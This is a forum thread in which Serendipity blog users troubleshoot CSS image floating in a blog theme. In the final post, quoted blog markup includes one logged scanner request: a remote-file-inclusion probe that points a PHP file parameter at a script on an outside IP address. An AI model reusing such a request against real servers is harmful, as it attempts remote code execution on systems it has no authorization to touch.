Question about picture positioning in Carl Contest

Skinning and designing Serendipity (CSS, HTML, Smarty)
Post Reply
Harald Weingaertner
Regular
Posts: 474
Joined: Mon Mar 27, 2006 12:32 am

Question about picture positioning in Carl Contest

Post by Harald Weingaertner »

Hello,

i'm confused, because i use Carls Themes on several blogs. On one, i may have destroyed something ;)

Is anybody able to tell me, why the text on th screenshot begins at the bottom of the picture and not at the top of the picture? I don't have a page with sourcecode to look onto, because it just looks too ugly right now.

Where can i look more deeply into to get my text back to the top?

Thanks in advance, Harald

Image
Timbalu
Regular
Posts: 4598
Joined: Sun May 02, 2004 3:04 pm

Post by Timbalu »

Please try this, Harald:

<img style="border: 0px none ; float: left; padding-left: 2px; padding-right: 5px;" src="da/wo/bild.jpg" alt="" border="0" height="xxx" width="xxx">

Ian
yellowled
Regular
Posts: 7111
Joined: Fri Jan 13, 2006 11:46 am
Location: Eutin, Germany
Contact:

Re: Question about picture positioning in Carl Contest

Post by yellowled »

Harald Weingaertner wrote:Is anybody able to tell me, why the text on th screenshot begins at the bottom of the picture and not at the top of the picture?
Erm, I might look at this in a wrong way, but maybe you've simply used a different display option in the media manager? There's three of them, and one is supposed to look exactly like this. Or is this not an image included using the media manager?

YL
judebert
Regular
Posts: 2478
Joined: Sat Oct 15, 2005 6:57 am
Location: Orlando, FL
Contact:

Post by judebert »

Sure enough, that's what happens when an image isn't floated. Check the way you inserted it into the entry, and the style.css.
Judebert
---
Website | Wishlist | PayPal
Harald Weingaertner
Regular
Posts: 474
Joined: Mon Mar 27, 2006 12:32 am

Post by Harald Weingaertner »

Thank you. I'll try your fixes, when the server is back up again ;)
Harald Weingaertner
Regular
Posts: 474
Joined: Mon Mar 27, 2006 12:32 am

Post by Harald Weingaertner »

Guys, would you be so kind and help again?

This is an example of the article, where the image with the pig isn't floated. I'm not very firm with the CSS stuff and maybe you are able to "debug" the mistake with a quick view?

Any help would be appreciated.
Don Chambers
Regular
Posts: 3657
Joined: Mon Feb 13, 2006 2:40 am
Location: Chicago, IL, USA
Contact:

Post by Don Chambers »

The image *IS* floated to the right. The problem is with the length of the sentence. Oddly enough, IE handles this just fine for a change, but FF does not.

I have had no experience with this matter at all. I googled and came up a little info. Not a specific recommendation, but this particular article seemed interesting: http://ecmascript.stchur.com/2007/02/22 ... firefox/1/
=Don=
Timbalu
Regular
Posts: 4598
Joined: Sun May 02, 2004 3:04 pm

Post by Timbalu »

Hi Harald
Strange - try it this way please:

Code: Select all

...
Das scheint ein automatisches Skript zu sein, das einfach auf Verdacht Hunderte Dateinamen aufruft und guckt, ob etwas antwortet. Einige Beispiele:<!-- s9ymdb:37 --><img style="border: 0px none ; float: right; padding-left: 5px; padding-right: 5px;" src="/uploads/kaffeekasse.evo.gif" alt="" height="140" width="148" /><br />
<br />
/portal/index.php?file_name[]=http://203.198.68.236/~lisir/M.txt?&/<br />....
Post Reply